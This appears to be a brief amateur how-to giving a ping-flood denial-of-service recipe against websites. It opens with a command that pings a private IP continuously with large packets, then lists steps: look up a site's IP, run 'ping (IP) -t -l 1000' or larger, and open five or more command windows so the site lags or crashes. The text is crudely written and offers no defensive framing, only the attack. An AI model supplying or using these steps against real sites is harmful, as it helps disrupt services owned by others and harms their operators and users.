ping 172.22.17.142 -t -l 50000




1. Open CMD
2. Write "ping (web")
3. If you write it you see up the ip in [ ].
4. Write "ping (IP) -t -l 1000 !If you make more than 1000!
    your choice you must have just good internet.
5. Just wait for sending pickets what lagging web / or crash
6. If you want rly laggy website you must open CMD more than 5X and do the same steps.
